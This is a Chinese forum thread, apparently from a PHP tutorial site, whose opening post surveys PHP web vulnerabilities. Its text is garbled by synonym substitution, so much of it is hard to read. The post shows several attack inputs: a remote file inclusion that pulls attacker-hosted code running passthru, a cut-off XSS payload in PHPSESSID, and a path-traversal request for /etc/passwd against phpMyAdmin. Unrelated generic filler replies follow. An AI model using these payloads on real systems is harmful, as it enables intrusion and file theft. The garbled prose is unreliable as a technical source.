仓酷云

标题: PHP教程之php页面破绽剖析及相干成绩处理 [打印本页]

作者: 萌萌妈妈 时间: 2015-2-3 23:38
标题: PHP教程之php页面破绽剖析及相干成绩处理
你发奋努力，熟悉了安全方面的问题，然后又设计了一些程序，感觉还不错。　　从如今的收集平安来看，人人最存眷和接触最多的WEB页面破绽应当是ASP了，在这方面，小竹是专家，我没讲话权。但是在PHP方面来看，也一样存在很严重的平安成绩，然而这方面的文章却不多。在这里，就跟人人来略微的会商一下PHP页面的相干破绽吧。
　　我对今朝罕见的PHP破绽做了一下总结，大致分为以下几种：包括文件破绽，剧本号令履行破绽，文件泄漏破绽，SQL注入破绽等几种。固然，至于COOKIE棍骗等一局部通用的手艺就不在这里会商了，这些材料网上也良多。那末，咱们就一个一个来剖析一下如何使用这些破绽吧!
　　起首，咱们来会商包括文件破绽。这个破绽应当说是PHP独有的吧。这是因为不充实处置内部供应的歹意数据，从而招致近程进击者可以使用这些破绽以WEB历程权限在体系上履行恣意号令。咱们来看一个例子：假定在a.php中有如许一句代码:
以下是援用片断：
include($include."/xxx.php");
　　?>
　　在这段代码中，$include通常为一个已设置好的途径，然而咱们可以经由过程本人机关一个途径来到达进击的目标。例如说咱们提交:a.php?include=http://web/b.php，这个web是咱们用做进击的空间，固然，b.php也就是咱们用来进击的代码了。咱们可以在b.php中写入相似于:passthru("/bin/ls /etc");的代码。如许，就能够履行一些有目标的进击了。(注:Web办事器应当不克不及履行php代码，否则就出成绩了。相干概况可以去看<<若何对PHP法式中的罕见破绽停止进击>>)。在这个破绽方面，出情况的良多，例如说:PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。
　　接着，咱们再来看一下剧本号令履行破绽。这是因为对用户提交的URI参数短少充实过滤，提交包括歹意HTML代码的数据，可招致触发跨站剧本进击，能够取得方针用户的敏感信息。咱们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面临PHPSESSID短少充实的过滤,咱们可以经由过程如许的代码来到达进击的目标:http://web/index.php?PHPSESSID=">在script外面咱们可以机关函数来取得用户的一些敏感信息。在这个破绽方面绝对要少一点，除PHP Transparent以外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。
再然后，咱们就来看看文件泄漏破绽了，这类破绽是因为对用户提交参数短少充实过滤，近程进击者可以使用它停止目次遍历进击和获得一些敏感信息。咱们拿比来发明的phpMyAdmin来做例子。在phpMyAdmin中，export.php页面没有对用户提交的'what'参数停止充实过滤，近程进击者提交包括多个'../'字符的数据，即可绕过WEB ROOT限制，以WEB权限检查体系上的恣意文件信息。例如说打入如许一个地址:export.php?what=../../../../../../etc/passwd%00 就能够到达文件泄漏的目标了。在这方面绝对多一点，有:myPHPNuke,McNews等等。
　　最初，咱们又要回到最高兴的中央了。想一想咱们平常在asp页面顶用SQL注入有何等爽，之前还要手动注入，一向到小竹悟出"SQL注入密笈"(嘿嘿)，然后再开做出NBSI今后，咱们NB同盟真是拉出一片天空。曾前后帮CSDN，豪富翁服装论坛，中国频道等大型网站找露马脚。(这些空话不多说了，有点跑题了...)。
<P> 1 2 3 4 下一页 >全文浏览提醒：尝尝"← →"键，翻页更便利哦！我的这套线路可能跟许多学习PHP的爱好者不谋而合，这也算是一个循序渐进的学习过程，不过新手不要看到上面的概括就以为学习蛮简单的，默默在此不得不对您稍微泼一下冷水，任何东西其实都不简单。

作者: 小魔女 时间: 2015-2-4 04:01
如果你已经到这种程度了，那么你已经可以做我的老师了。其实php也分很多的区域，

作者: 深爱那片海 时间: 2015-2-9 15:46
小鸟是第一次发帖（我习惯潜水的(*^__^*) 嘻嘻……），有错误之处还请大家批评指正，另外，前些日子听人说有高手能用php写驱动程序，真是学无止境，人外有人，天外有天。

作者: 精灵巫婆 时间: 2015-2-27 09:00
当留言板完成的时候，下步可以把做1个单人的blog程序，做为目标，

作者: 再见西城 时间: 2015-3-8 23:56
作为一个合格的coder 编码的规范是必须，命名方面我推崇“驼峰法”，另外就是自己写的代码最好要带注释，不然时间长了，就算是自己的代码估计看起来都费事，更不用说别人拉。

作者: 小妖女 时间: 2015-3-16 17:51
说php的话，首先得提一下数组，开始的时候我是最烦数组的，总是被弄的晕头转向，不过后来呢，我觉得数组里php里最强大的存储方法，所以建议新手们要学好数组。

作者: admin 时间: 2015-3-20 13:26
做为1门年轻的语言，php一直很努力。

作者: 乐观 时间: 2015-3-27 06:08
兴趣是最好的老师，百度是最好的词典。

作者: 若相依 时间: 2015-3-27 06:10
我学习了一段时间后，我发现效果并不好（估计是我自身的问题）。因为一个人的精力总是有限的，同时学习这么多，会导致每个的学习时间都得不到保证。

作者: 莫相离 时间: 2015-4-10 18:20
对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用，而且里面的资料也比较有用，最好还是买个会员比较好，毕竟那些也是别人的工作成果。

作者: 冷月葬花魂 时间: 2015-4-11 01:55
开发工具也会慢慢的更专业，每个公司的可能不一样，但是zend studio是个大伙都会用的。

作者: 分手快乐 时间: 2015-4-21 17:17
环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候，我强烈建议多读php手册。

作者: 爱飞 时间: 2015-4-26 18:49
微软最近出的新字体“微软雅黑”，虽然是挺漂亮的，不过firefox 支持的不是很好，所以能少用还是少用的好。

作者: 飘飘悠悠 时间: 2015-4-27 17:03
因为blog这样的可以让你接触更多要学的知识，可以接触用到类，模板，js ，ajax

作者: 谁可相欹 时间: 2015-6-8 01:31
最后祝愿，php会给你带来快乐的同时你也会给他带来快乐。

作者: 灵魂腐蚀 时间: 2015-6-22 22:05
真正的方向了，如果将来要去开发团队，你一定要学好smarty ,phplib这样的模板引擎，

作者: 老尸 时间: 2015-6-27 00:21
本人接触php时间不长，算是phper中的小菜鸟一只吧。由于刚开始学的时候没有名师指，碰过不少疙瘩，呗很多小问题卡过很久，白白浪费不少宝贵的时间，在次分享一些子的学习的心得。

作者: 只想知道 时间: 2015-7-12 05:48
在学习的过程中不能怕麻烦，不能有懒惰的思想。学习php首先应该搭建一个lamp环境或者是wamp环境。这是学习php开发的根本。虽然网络上有很多集成的环境，安装很方便，使用起来也很稳定、

作者: 变相怪杰 时间: 2015-7-13 14:41
你很难利用原理去编写自己的代码。对于php来说，系统的学习我认为还是很重要的，当你有一定理解后，你可你针对某种效果研究，我想那时你不会只是复制代码的水平了。

作者: 活着的死人 时间: 2015-7-14 12:46
因为blog这样的可以让你接触更多要学的知识，可以接触用到类，模板，js ，ajax

欢迎光临仓酷云 (http://ckuyun.com/)